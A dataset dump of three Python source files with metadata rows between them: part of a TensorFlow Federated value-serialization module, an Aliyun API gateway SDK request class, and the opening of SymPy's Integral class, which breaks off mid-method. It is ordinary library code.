dtype=tf.DType(tensor_proto.dtype),
shape=tf.TensorShape(tensor_proto.tensor_shape))
return tensor_value, value_type
def serialize_sequence_value(value):
"""Serializes a `tf.data.Dataset` value into `executor_pb2.Value`.
Args:
value: A `tf.data.Dataset`, or equivalent.
Returns:
A tuple `(value_proto, type_spec)` in which `value_proto` is an instance
of `executor_pb2.Value` with the serialized content of `value`, and
`type_spec` is the type of the serialized value.
"""
py_typecheck.check_type(value, tensorflow_utils.DATASET_REPRESENTATION_TYPES)
# TFF must store the type spec here because TF will lose the ordering of the
# names for `tf.data.Dataset` that return elements of `collections.Mapping`
# type. This allows TFF to preserve and restore the key ordering upon
# deserialization.
element_type = computation_types.to_type(
tf.data.experimental.get_structure(value))
return executor_pb2.Value(
sequence=executor_pb2.Value.Sequence(
zipped_saved_model=tensorflow_serialization.serialize_dataset(value),
element_type=type_serialization.serialize_type(element_type)))
def deserialize_sequence_value(sequence_value_proto):
"""Deserializes a `tf.data.Dataset`.
Args:
sequence_value_proto: `Sequence` protocol buffer message.
Returns:
A tuple of `(tf.data.Dataset, tff.Type)`.
"""
py_typecheck.check_type(sequence_value_proto, executor_pb2.Value.Sequence)
which_value = sequence_value_proto.WhichOneof('value')
if which_value == 'zipped_saved_model':
ds = tensorflow_serialization.deserialize_dataset(
sequence_value_proto.zipped_saved_model)
else:
raise NotImplementedError(
'Deserializing Sequences enocded as {!s} has not been implemented'
.format(which_value))
element_type = type_serialization.deserialize_type(
sequence_value_proto.element_type)
# If a serialized dataset had elements of nested structes of tensors (e.g.
# `dict`, `OrderedDict`), the deserialized dataset will return `dict`,
# `tuple`, or `namedtuple` (loses `collections.OrderedDict` in a conversion).
#
# Since the dataset will only be used inside TFF, we wrap the dictionary
# coming from TF in an `OrderedDict` when necessary (a type that both TF and
# TFF understand), using the field order stored in the TFF type stored during
# serialization.
ds = tensorflow_utils.coerce_dataset_elements_to_tff_type_spec(
ds, element_type)
return ds, computation_types.SequenceType(element=element_type)
def serialize_value(value, type_spec=None):
"""Serializes a value into `executor_pb2.Value`.
Args:
value: A value to be serialized.
type_spec: Optional type spec, a `tff.Type` or something convertible to it.
Returns:
A tuple `(value_proto, ret_type_spec)` where `value_proto` is an instance
of `executor_pb2.Value` with the serialized content of `value`, and the
returned `ret_type_spec` is an instance of `tff.Type` that represents the
TFF type of the serialized value.
Raises:
TypeError: If the arguments are of the wrong types.
ValueError: If the value is malformed.
"""
type_spec = computation_types.to_type(type_spec)
if isinstance(value, computation_pb2.Computation):
type_spec = type_utils.reconcile_value_type_with_type_spec(
type_serialization.deserialize_type(value.type), type_spec)
return executor_pb2.Value(computation=value), type_spec
elif isinstance(value, computation_impl.ComputationImpl):
return serialize_value(
computation_impl.ComputationImpl.get_proto(value),
type_utils.reconcile_value_with_type_spec(value, type_spec))
elif isinstance(type_spec, computation_types.TensorType):
return serialize_tensor_value(value, type_spec)
elif isinstance(type_spec, computation_types.NamedTupleType):
type_elements = anonymous_tuple.to_elements(type_spec)
val_elements = anonymous_tuple.to_elements(
anonymous_tuple.from_container(value))
tup_elems = []
for (e_name, e_type), (_, e_val) in zip(type_elements, val_elements):
e_proto, _ = serialize_value(e_val, e_type)
tup_elems.append(
executor_pb2.Value.Tuple.Element(
name=e_name if e_name else None, value=e_proto))
result_proto = (
executor_pb2.Value(tuple=executor_pb2.Value.Tuple(element=tup_elems)))
return result_proto, type_spec
elif isinstance(type_spec, computation_types.SequenceType):
if not isinstance(value, tensorflow_utils.DATASET_REPRESENTATION_TYPES):
raise TypeError(
'Cannot serialize Python type {!s} as TFF type {!s}.'.format(
py_typecheck.type_string(type(value)),
type_spec if type_spec is not None else 'unknown'))
value_type = computation_types.SequenceType(
computation_types.to_type(tf.data.experimental.get_structure(value)))
if not type_utils.is_assignable_from(type_spec, value_type):
raise TypeError(
'Cannot serialize dataset with elements of type {!s} as TFF type {!s}.'
.format(value_type,
type_spec if type_spec is not None else 'unknown'))
return serialize_sequence_value(value), type_spec
elif isinstance(type_spec, computation_types.FederatedType):
if type_spec.all_equal:
value = [value]
else:
py_typecheck.check_type(value, list)
items = []
for v in value:
it, it_type = serialize_value(v, type_spec.member)
type_utils.check_assignable_from(type_spec.member, it_type)
items.append(it)
result_proto = executor_pb2.Value(
federated=executor_pb2.Value.Federated(
type=type_serialization.serialize_type(type_spec).federated,
value=items))
return result_proto, type_spec
else:
raise ValueError(
'Unable to serialize value with Python type {} and {} TFF type.'.format(
str(py_typecheck.type_string(type(value))),
str(type_spec) if type_spec is not None else 'unknown'))
def deserialize_value(value_proto):
"""Deserializes a value (of any type) from `executor_pb2.Value`.
Args:
value_proto: An instance of `executor_pb2.Value`.
Returns:
A tuple `(value, type_spec)`, where `value` is a deserialized
representation of the transmitted value (e.g., Numpy array, or a
`pb.Computation` instance), and `type_spec` is an instance of
`tff.TensorType` that represents its type.
Raises:
TypeError: If the arguments are of the wrong types.
ValueError: If the value is malformed.
"""
py_typecheck.check_type(value_proto, executor_pb2.Value)
which_value = value_proto.WhichOneof('value')
if which_value == 'tensor':
return deserialize_tensor_value(value_proto)
elif which_value == 'computation':
return (value_proto.computation,
type_serialization.deserialize_type(value_proto.computation.type))
elif which_value == 'tuple':
val_elems = []
type_elems = []
for e in value_proto.tuple.element:
name = e.name if e.name else None
e_val, e_type = deserialize_value(e.value)
val_elems.append((name, e_val))
type_elems.append((name, e_type) if name else e_type)
return (anonymous_tuple.AnonymousTuple(val_elems),
computation_types.NamedTupleType(type_elems))
elif which_value == 'sequence':
return deserialize_sequence_value(value_proto.sequence)
elif which_value == 'federated':
type_spec = type_serialization.deserialize_type(
computation_pb2.Type(federated=value_proto.federated.type))
value = []
for item in value_proto.federated.value:
item_value, item_type = deserialize_value(item)
type_utils.check_assignable_from(type_spec.member, item_type)
value.append(item_value)
if type_spec.all_equal:
if len(value) == 1:
value = value[0]
else:
raise ValueError(
'Return an all_equal value with {} member consatituents.'.format(
len(value)))
return value, type_spec
else:
raise ValueError(
'Unable to deserialize a value of type {}.'.format(which_value))
| 40.645367 | 81 | 0.734319 |
cf39c4adaed535c2777301270dab5d949045991c | 2,136 | py | Python | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcloudapi.endpoint import endpoint_data
class SetTrafficControlApisRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CloudAPI', '2016-07-14', 'SetTrafficControlApis','apigateway')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_TrafficControlId(self):
return self.get_query_params().get('TrafficControlId')
def set_TrafficControlId(self,TrafficControlId):
self.add_query_param('TrafficControlId',TrafficControlId)
def get_StageName(self):
return self.get_query_params().get('StageName')
def set_StageName(self,StageName):
self.add_query_param('StageName',StageName)
def get_GroupId(self):
return self.get_query_params().get('GroupId')
def set_GroupId(self,GroupId):
self.add_query_param('GroupId',GroupId)
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
def get_ApiIds(self):
return self.get_query_params().get('ApiIds')
def set_ApiIds(self,ApiIds):
self.add_query_param('ApiIds',ApiIds) | 35.016393 | 91 | 0.769195 |
3119d84522ba52c069d9d3a861d66b0cb18bd5bc | 57,759 | py | Python | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | 2 | 2018-12-05T02:30:43.000Z | 2020-11-14T01:43:15.000Z | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | null | null | null | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function, division
from sympy.concrete.expr_with_limits import AddWithLimits
from sympy.core.add import Add
from sympy.core.basic import Basic
from sympy.core.compatibility import is_sequence, range
from sympy.core.containers import Tuple
from sympy.core.expr import Expr
from sympy.core.function import diff
from sympy.core.mul import Mul
from sympy.core.numbers import oo, pi
from sympy.core.relational import Eq, Ne
from sympy.core.singleton import S
from sympy.core.symbol import (Dummy, Symbol, Wild)
from sympy.core.sympify import sympify
from sympy.integrals.manualintegrate import manualintegrate
from sympy.integrals.trigonometry import trigintegrate
from sympy.integrals.meijerint import meijerint_definite, meijerint_indefinite
from sympy.matrices import MatrixBase
from sympy.utilities.misc import filldedent
from sympy.polys import Poly, PolynomialError
from sympy.functions import Piecewise, sqrt, sign, piecewise_fold, tan, cot, atan
from sympy.functions.elementary.exponential import log
from sympy.functions.elementary.integers import floor
from sympy.functions.elementary.complexes import Abs, sign
from sympy.functions.elementary.miscellaneous import Min, Max
from sympy.series import limit
from sympy.series.order import Order
from sympy.series.formal import FormalPowerSeries
from sympy.simplify.fu import sincos_to_sum
class Integral(AddWithLimits):
"""Represents unevaluated integral."""
__slots__ = ['is_commutative']
def __new__(cls, function, *symbols, **assumptions):
"""Create an unevaluated integral.
Arguments are an integrand followed by one or more limits.
If no limits are given and there is only one free symbol in the
expression, that symbol will be used, otherwise an error will be
raised.
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x)
Integral(x, x)
>>> Integral(y)
Integral(y, y)
When limits are provided, they are interpreted as follows (using
``x`` as though it were the variable of integration):
(x,) or x - indefinite integral
(x, a) - "evaluate at" integral is an abstract antiderivative
(x, a, b) - definite integral
The ``as_dummy`` method can be used to see which symbols cannot be
targeted by subs: those with a preppended underscore cannot be
changed with ``subs``. (Also, the integration variables themselves --
the first element of a limit -- can never be changed by subs.)
>>> i = Integral(x, x)
>>> at = Integral(x, (x, x))
>>> i.as_dummy()
Integral(x, x)
>>> at.as_dummy()
Integral(_x, (_x, x))
"""
#This will help other classes define their own definitions
#of behaviour with Integral.
if hasattr(function, '_eval_Integral'):
return function._eval_Integral(*symbols, **assumptions)
obj = AddWithLimits.__new__(cls, function, *symbols, **assumptions)
return obj
def __getnewargs__(self):
return (self.function,) + tuple([tuple(xab) for xab in self.limits])
@property
def free_symbols(self):
"""
This method returns the symbols that will exist when the
integral is evaluated. This is useful if one is trying to
determine whether an integral depends on a certain
symbol or not.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x, (x, y, 1)).free_symbols
{y}
See Also
========
function, limits, variables
"""
return AddWithLimits.free_symbols.fget(self)
def _eval_is_zero(self):
# This is a very naive and quick test, not intended to do the integral to
# answer whether it is zero or not, e.g. Integral(sin(x), (x, 0, 2*pi))
# is zero but this routine should return None for that case. But, like
# Mul, there are trivial situations for which the integral will be
# zero so we check for those.
if self.function.is_zero:
return True
got_none = False
for l in self.limits:
if len(l) == 3:
z = (l[1] == l[2]) or (l[1] - l[2]).is_zero
if z:
return True
elif z is None:
got_none = True
free = self.function.free_symbols
for xab in self.limits:
if len(xab) == 1:
free.add(xab[0])
continue
if len(xab) == 2 and xab[0] not in free:
if xab[1].is_zero:
return True
elif xab[1].is_zero is None:
got_none = True
# take integration symbol out of free since it will be replaced
# with the free symbols in the limits
free.discard(xab[0])
# add in the new symbols
for i in xab[1:]:
free.update(i.free_symbols)
if self.function.is_zero is False and got_none is False:
return False
def transform(self, x, u):
r"""
Performs a change of variables from `x` to `u` using the relationship
given by `x` and `u` which will define the transformations `f` and `F`
(which are inverses of each other) as follows:
1) If `x` is a Symbol (which is a variable of integration) then `u`
will be interpreted as some function, f(u), with inverse F(u).
This, in effect, just makes the substitution of x with f(x).
2) If `u` is a Symbol then `x` will be interpreted as some function,
F(x), with inverse f(u). This is commonly referred to as
u-substitution.
Once f and F have been identified, the transformation is made as
follows:
.. math:: \int_a^b x \mathrm{d}x \rightarrow \int_{F(a)}^{F(b)} f(x)
\frac{\mathrm{d}}{\mathrm{d}x}
where `F(x)` is the inverse of `f(x)` and the limits and integrand have
been corrected so as to retain the same value after integration.
Notes
=====
The mappings, F(x) or f(u), must lead to a unique integral. Linear
or rational linear expression, `2*x`, `1/x` and `sqrt(x)`, will
always work; quadratic expressions like `x**2 - 1` are acceptable
as long as the resulting integrand does not depend on the sign of
the solutions (see examples).
The integral will be returned unchanged if `x` is not a variable of
integration.
`x` must be (or contain) only one of of the integration variables. If
`u` has more than one free symbol then it should be sent as a tuple
(`u`, `uvar`) where `uvar` identifies which variable is replacing
the integration variable.
XXX can it contain another integration variable?
Examples
========
>>> from sympy.abc import a, b, c, d, x, u, y
>>> from sympy import Integral, S, cos, sqrt
>>> i = Integral(x*cos(x**2 - 1), (x, 0, 1))
transform can change the variable of integration
>>> i.transform(x, u)
Integral(u*cos(u**2 - 1), (u, 0, 1))
transform can perform u-substitution as long as a unique
integrand is obtained:
>>> i.transform(x**2 - 1, u)
Integral(cos(u)/2, (u, -1, 0))
This attempt fails because x = +/-sqrt(u + 1) and the
sign does not cancel out of the integrand:
>>> Integral(cos(x**2 - 1), (x, 0, 1)).transform(x**2 - 1, u)
Traceback (most recent call last):
...
ValueError:
The mapping between F(x) and f(u) did not give a unique integrand.
transform can do a substitution. Here, the previous
result is transformed back into the original expression
using "u-substitution":
>>> ui = _
>>> _.transform(sqrt(u + 1), x) == i
True
We can accomplish the same with a regular substitution:
>>> ui.transform(u, x**2 - 1) == i
True
If the `x` does not contain a symbol of integration then
the integral will be returned unchanged. Integral `i` does
not have an integration variable `a` so no change is made:
>>> i.transform(a, x) == i
True
When `u` has more than one free symbol the symbol that is
replacing `x` must be identified by passing `u` as a tuple:
>>> Integral(x, (x, 0, 1)).transform(x, (u + a, u))
Integral(a + u, (u, -a, -a + 1))
>>> Integral(x, (x, 0, 1)).transform(x, (u + a, a))
Integral(a + u, (a, -u, -u + 1))
See Also
========
variables : Lists the integration variables
as_dummy : Replace integration variables with dummy ones
"""
from sympy.solvers.solvers import solve, posify
d = Dummy('d')
xfree = x.free_symbols.intersection(self.variables)
if len(xfree) > 1:
raise ValueError(
'F(x) can only contain one of: %s' % self.variables)
xvar = xfree.pop() if xfree else d
if xvar not in self.variables:
return self
u = sympify(u)
if isinstance(u, Expr):
ufree = u.free_symbols
if len(ufree) != 1:
raise ValueError(filldedent('''
When f(u) has more than one free symbol, the one replacing x
must be identified: pass f(u) as (f(u), u)'''))
uvar = ufree.pop()
else:
u, uvar = u
if uvar not in u.free_symbols:
raise ValueError(filldedent('''
Expecting a tuple (expr, symbol) where symbol identified
a free symbol in expr, but symbol is not in expr's free
symbols.'''))
if not isinstance(uvar, Symbol):
raise ValueError(filldedent('''
Expecting a tuple (expr, symbol) but didn't get
a symbol; got %s''' % uvar))
if x.is_Symbol and u.is_Symbol:
return self.xreplace({x: u})
if not x.is_Symbol and not u.is_Symbol:
raise ValueError('either x or u must be a symbol')
if uvar == xvar:
return self.transform(x, (u.subs(uvar, d), d)).xreplace({d: uvar})
if uvar in self.limits:
raise ValueError(filldedent('''
u must contain the same variable as in x
or a variable that is not already an integration variable'''))
if not x.is_Symbol:
F = [x.subs(xvar, d)]
soln = solve(u - x, xvar, check=False)
if not soln:
raise ValueError('no solution for solve(F(x) - f(u), x)')
f = [fi.subs(uvar, d) for fi in soln]
else:
f = [u.subs(uvar, d)]
pdiff, reps = posify(u - x)
puvar = uvar.subs([(v, k) for k, v in reps.items()])
soln = [s.subs(reps) for s in solve(pdiff, puvar)]
if not soln:
raise ValueError('no solution for solve(F(x) - f(u), u)')
F = [fi.subs(xvar, d) for fi in soln]
newfuncs = set([(self.function.subs(xvar, fi)*fi.diff(d)
).subs(d, uvar) for fi in f])
if len(newfuncs) > 1:
raise ValueError(filldedent('''
The mapping between F(x) and f(u) did not give
a unique integrand.'''))
newfunc = newfuncs.pop()
def _calc_limit_1(F, a, b):
"""
replace d with a, using subs if possible, otherwise limit
where sign of b is considered
"""
wok = F.subs(d, a)
if wok is S.NaN or wok.is_finite is False and a.is_finite:
return limit(sign(b)*F, d, a)
return wok
def _calc_limit(a, b):
"""
replace d with a, using subs if possible, otherwise limit
where sign of b is considered
"""
avals = list({_calc_limit_1(Fi, a, b) for Fi in F})
if len(avals) > 1:
raise ValueError(filldedent('''
The mapping between F(x) and f(u) did not
give a unique limit.'''))
return avals[0]
newlimits = []
for xab in self.limits:
sym = xab[0]
if sym == xvar:
if len(xab) == 3:
a, b = xab[1:]
a, b = _calc_limit(a, b), _calc_limit(b, a)
if a - b > 0:
a, b = b, a
newfunc = -newfunc
newlimits.append((uvar, a, b))
elif len(xab) == 2:
a = _calc_limit(xab[1], 1)
newlimits.append((uvar, a))
else:
newlimits.append(uvar)
else:
newlimits.append(xab)
return self.func(newfunc, *newlimits)
def doit(self, **hints):
"""
Perform the integration using any hints given.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, i
>>> Integral(x**i, (i, 1, 3)).doit()
Piecewise((x**3/log(x) - x/log(x),
(x > 1) | ((x >= 0) & (x < 1))), (2, True))
See Also
========
sympy.integrals.trigonometry.trigintegrate
sympy.integrals.risch.heurisch
sympy.integrals.rationaltools.ratint
as_sum : Approximate the integral using a sum
"""
if not hints.get('integrals', True):
return self
deep = hints.get('deep', True)
meijerg = hints.get('meijerg', None)
conds = hints.get('conds', 'piecewise')
risch = hints.get('risch', None)
manual = hints.get('manual', None)
if len(list(filter(None, (manual, meijerg, risch)))) > 1:
raise ValueError("At most one of manual, meijerg, risch can be True")
elif manual:
meijerg = risch = False
elif meijerg:
manual = risch = False
elif risch:
manual = meijerg = False
eval_kwargs = dict(meijerg=meijerg, risch=risch, manual=manual,
conds=conds)
if conds not in ['separate', 'piecewise', 'none']:
raise ValueError('conds must be one of "separate", "piecewise", '
'"none", got: %s' % conds)
if risch and any(len(xab) > 1 for xab in self.limits):
raise ValueError('risch=True is only allowed for indefinite integrals.')
# check for the trivial zero
if self.is_zero:
return S.Zero
# now compute and check the function
function = self.function
if deep:
function = function.doit(**hints)
if function.is_zero:
return S.Zero
# hacks to handle special cases
if isinstance(function, MatrixBase):
return function.applyfunc(
lambda f: self.func(f, self.limits).doit(**hints))
if isinstance(function, FormalPowerSeries):
if len(self.limits) > 1:
raise NotImplementedError
xab = self.limits[0]
if len(xab) > 1:
return function.integrate(xab, **eval_kwargs)
else:
return function.integrate(xab[0], **eval_kwargs)
# There is no trivial answer and special handling
# is done so continue
undone_limits = []
# ulj = free symbols of any undone limits' upper and lower limits
ulj = set()
for xab in self.limits:
# compute uli, the free symbols in the
# Upper and Lower limits of limit I
if len(xab) == 1:
uli = set(xab[:1])
elif len(xab) == 2:
uli = xab[1].free_symbols
elif len(xab) == 3:
uli = xab[1].free_symbols.union(xab[2].free_symbols)
# this integral can be done as long as there is no blocking
# limit that has been undone. An undone limit is blocking if
# it contains an integration variable that is in this limit's
# upper or lower free symbols or vice versa
if xab[0] in ulj or any(v[0] in uli for v in undone_limits):
undone_limits.append(xab)
ulj.update(uli)
function = self.func(*([function] + [xab]))
factored_function = function.factor()
if not isinstance(factored_function, Integral):
function = factored_function
continue
if function.has(Abs, sign) and (
(len(xab) < 3 and all(x.is_real for x in xab)) or
(len(xab) == 3 and all(x.is_real and x.is_finite for
x in xab[1:]))):
# some improper integrals are better off with Abs
xr = Dummy("xr", real=True)
function = (function.xreplace({xab[0]: xr})
.rewrite(Piecewise).xreplace({xr: xab[0]}))
elif function.has(Min, Max):
function = function.rewrite(Piecewise)
if (function.has(Piecewise) and
not isinstance(function, Piecewise)):
function = piecewise_fold(function)
if isinstance(function, Piecewise):
if len(xab) == 1:
antideriv = function._eval_integral(xab[0],
**eval_kwargs)
else:
antideriv = self._eval_integral(
function, xab[0], **eval_kwargs)
else:
# There are a number of tradeoffs in using the
# Meijer G method. It can sometimes be a lot faster
# than other methods, and sometimes slower. And
# there are certain types of integrals for which it
# is more likely to work than others. These
# heuristics are incorporated in deciding what
# integration methods to try, in what order. See the
# integrate() docstring for details.
def try_meijerg(function, xab):
ret = None
if len(xab) == 3 and meijerg is not False:
x, a, b = xab
try:
res = meijerint_definite(function, x, a, b)
except NotImplementedError:
from sympy.integrals.meijerint import _debug
_debug('NotImplementedError '
'from meijerint_definite')
res = None
if res is not None:
f, cond = res
if conds == 'piecewise':
ret = Piecewise(
(f, cond),
(self.func(
function, (x, a, b)), True))
elif conds == 'separate':
if len(self.limits) != 1:
raise ValueError(filldedent('''
conds=separate not supported in
multiple integrals'''))
ret = f, cond
else:
ret = f
return ret
meijerg1 = meijerg
if (meijerg is not False and
len(xab) == 3 and xab[1].is_real and xab[2].is_real
and not function.is_Poly and
(xab[1].has(oo, -oo) or xab[2].has(oo, -oo))):
ret = try_meijerg(function, xab)
if ret is not None:
function = ret
continue
meijerg1 = False
# If the special meijerg code did not succeed in
# finding a definite integral, then the code using
# meijerint_indefinite will not either (it might
# find an antiderivative, but the answer is likely
# to be nonsensical). Thus if we are requested to
# only use Meijer G-function methods, we give up at
# this stage. Otherwise we just disable G-function
# methods.
if meijerg1 is False and meijerg is True:
antideriv = None
else:
antideriv = self._eval_integral(
function, xab[0], **eval_kwargs)
if antideriv is None and meijerg is True:
ret = try_meijerg(function, xab)
if ret is not None:
function = ret
continue
if not isinstance(antideriv, Integral) and antideriv is not None:
sym = xab[0]
for atan_term in antideriv.atoms(atan):
atan_arg = atan_term.args[0]
# Checking `atan_arg` to be linear combination of `tan` or `cot`
for tan_part in atan_arg.atoms(tan):
x1 = Dummy('x1')
tan_exp1 = atan_arg.subs(tan_part, x1)
# The coefficient of `tan` should be constant
coeff = tan_exp1.diff(x1)
if x1 not in coeff.free_symbols:
a = tan_part.args[0]
antideriv = antideriv.subs(atan_term, Add(atan_term,
sign(coeff)*pi*floor((a-pi/2)/pi)))
for cot_part in atan_arg.atoms(cot):
x1 = Dummy('x1')
cot_exp1 = atan_arg.subs(cot_part, x1)
# The coefficient of `cot` should be constant
coeff = cot_exp1.diff(x1)
if x1 not in coeff.free_symbols:
a = cot_part.args[0]
antideriv = antideriv.subs(atan_term, Add(atan_term,
sign(coeff)*pi*floor((a)/pi)))
if antideriv is None:
undone_limits.append(xab)
function = self.func(*([function] + [xab])).factor()
factored_function = function.factor()
if not isinstance(factored_function, Integral):
function = factored_function
continue
else:
if len(xab) == 1:
function = antideriv
else:
if len(xab) == 3:
x, a, b = xab
elif len(xab) == 2:
x, b = xab
a = None
else:
raise NotImplementedError
if deep:
if isinstance(a, Basic):
a = a.doit(**hints)
if isinstance(b, Basic):
b = b.doit(**hints)
if antideriv.is_Poly:
gens = list(antideriv.gens)
gens.remove(x)
antideriv = antideriv.as_expr()
function = antideriv._eval_interval(x, a, b)
function = Poly(function, *gens)
else:
def is_indef_int(g, x):
return (isinstance(g, Integral) and
any(i == (x,) for i in g.limits))
def eval_factored(f, x, a, b):
# _eval_interval for integrals with
# (constant) factors
# a single indefinite integral is assumed
args = []
for g in Mul.make_args(f):
if is_indef_int(g, x):
args.append(g._eval_interval(x, a, b))
else:
args.append(g)
return Mul(*args)
integrals, others = [], []
for f in Add.make_args(antideriv):
if any(is_indef_int(g, x)
for g in Mul.make_args(f)):
integrals.append(f)
else:
others.append(f)
uneval = Add(*[eval_factored(f, x, a, b)
for f in integrals])
try:
evalued = Add(*others)._eval_interval(x, a, b)
function = uneval + evalued
except NotImplementedError:
# This can happen if _eval_interval depends in a
# complicated way on limits that cannot be computed
undone_limits.append(xab)
function = self.func(*([function] + [xab]))
factored_function = function.factor()
if not isinstance(factored_function, Integral):
function = factored_function
return function
def _eval_derivative(self, sym):
"""Evaluate the derivative of the current Integral object by
differentiating under the integral sign [1], using the Fundamental
Theorem of Calculus [2] when possible.
Whenever an Integral is encountered that is equivalent to zero or
has an integrand that is independent of the variable of integration
those integrals are performed. All others are returned as Integral
instances which can be resolved with doit() (provided they are integrable).
References:
[1] http://en.wikipedia.org/wiki/Differentiation_under_the_integral_sign
[2] http://en.wikipedia.org/wiki/Fundamental_theorem_of_calculus
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> i = Integral(x + y, y, (y, 1, x))
>>> i.diff(x)
Integral(x + y, (y, x)) + Integral(1, y, (y, 1, x))
>>> i.doit().diff(x) == i.diff(x).doit()
True
>>> i.diff(y)
0
The previous must be true since there is no y in the evaluated integral:
>>> i.free_symbols
{x}
>>> i.doit()
2*x**3/3 - x/2 - 1/6
"""
# differentiate under the integral sign; we do not
# check for regularity conditions (TODO), see issue 4215
# get limits and the function
f, limits = self.function, list(self.limits)
# the order matters if variables of integration appear in the limits
# so work our way in from the outside to the inside.
limit = limits.pop(-1)
if len(limit) == 3:
x, a, b = limit
elif len(limit) == 2:
x, b = limit
a = None
else:
a = b = None
x = limit[0]
if limits: # f is the argument to an integral
f = self.func(f, *tuple(limits))
# assemble the pieces
def _do(f, ab):
dab_dsym = diff(ab, sym)
if not dab_dsym:
return S.Zero
if isinstance(f, Integral):
limits = [(x, x) if (len(l) == 1 and l[0] == x) else l
for l in f.limits]
f = self.func(f.function, *limits)
return f.subs(x, ab)*dab_dsym
rv = 0
if b is not None:
rv += _do(f, b)
if a is not None:
rv -= _do(f, a)
if len(limit) == 1 and sym == x:
# the dummy variable *is* also the real-world variable
arg = f
rv += arg
else:
# the dummy variable might match sym but it's
# only a dummy and the actual variable is determined
# by the limits, so mask off the variable of integration
# while differentiating
u = Dummy('u')
arg = f.subs(x, u).diff(sym).subs(u, x)
rv += self.func(arg, Tuple(x, a, b))
return rv
def _eval_integral(self, f, x, meijerg=None, risch=None, manual=None,
conds='piecewise'):
"""
Calculate the anti-derivative to the function f(x).
The following algorithms are applied (roughly in this order):
1. Simple heuristics (based on pattern matching and integral table):
- most frequently used functions (e.g. polynomials, products of
trig functions)
2. Integration of rational functions:
- A complete algorithm for integrating rational functions is
implemented (the Lazard-Rioboo-Trager algorithm). The algorithm
also uses the partial fraction decomposition algorithm
implemented in apart() as a preprocessor to make this process
faster. Note that the integral of a rational function is always
elementary, but in general, it may include a RootSum.
3. Full Risch algorithm:
- The Risch algorithm is a complete decision
procedure for integrating elementary functions, which means that
given any elementary function, it will either compute an
elementary antiderivative, or else prove that none exists.
Currently, part of transcendental case is implemented, meaning
elementary integrals containing exponentials, logarithms, and
(soon!) trigonometric functions can be computed. The algebraic
case, e.g., functions containing roots, is much more difficult
and is not implemented yet.
- If the routine fails (because the integrand is not elementary, or
because a case is not implemented yet), it continues on to the
next algorithms below. If the routine proves that the integrals
is nonelementary, it still moves on to the algorithms below,
because we might be able to find a closed-form solution in terms
of special functions. If risch=True, however, it will stop here.
4. The Meijer G-Function algorithm:
- This algorithm works by first rewriting the integrand in terms of
very general Meijer G-Function (meijerg in SymPy), integrating
it, and then rewriting the result back, if possible. This
algorithm is particularly powerful for definite integrals (which
is actually part of a different method of Integral), since it can
compute closed-form solutions of definite integrals even when no
closed-form indefinite integral exists. But it also is capable
of computing many indefinite integrals as well.
- Another advantage of this method is that it can use some results
about the Meijer G-Function to give a result in terms of a
Piecewise expression, which allows to express conditionally
convergent integrals.
- Setting meijerg=True will cause integrate() to use only this
method.
5. The "manual integration" algorithm:
- This algorithm tries to mimic how a person would find an
antiderivative by hand, for example by looking for a
substitution or applying integration by parts. This algorithm
does not handle as many integrands but can return results in a
more familiar form.
- Sometimes this algorithm can evaluate parts of an integral; in
this case integrate() will try to evaluate the rest of the
integrand using the other methods here.
- Setting manual=True will cause integrate() to use only this
method.
6. The Heuristic Risch algorithm:
- This is a heuristic version of the Risch algorithm, meaning that
it is not deterministic. This is tried as a last resort because
it can be very slow. It is still used because not enough of the
full Risch algorithm is implemented, so that there are still some
integrals that can only be computed using this method. The goal
is to implement enough of the Risch and Meijer G-function methods
so that this can be deleted.
"""
from sympy.integrals.deltafunctions import deltaintegrate
from sympy.integrals.singularityfunctions import singularityintegrate
from sympy.integrals.heurisch import heurisch, heurisch_wrapper
from sympy.integrals.rationaltools import ratint
from sympy.integrals.risch import risch_integrate
if risch:
try:
return risch_integrate(f, x, conds=conds)
except NotImplementedError:
return None
if manual:
try:
result = manualintegrate(f, x)
if result is not None and result.func != Integral:
return result
except (ValueError, PolynomialError):
pass
eval_kwargs = dict(meijerg=meijerg, risch=risch, manual=manual,
conds=conds)
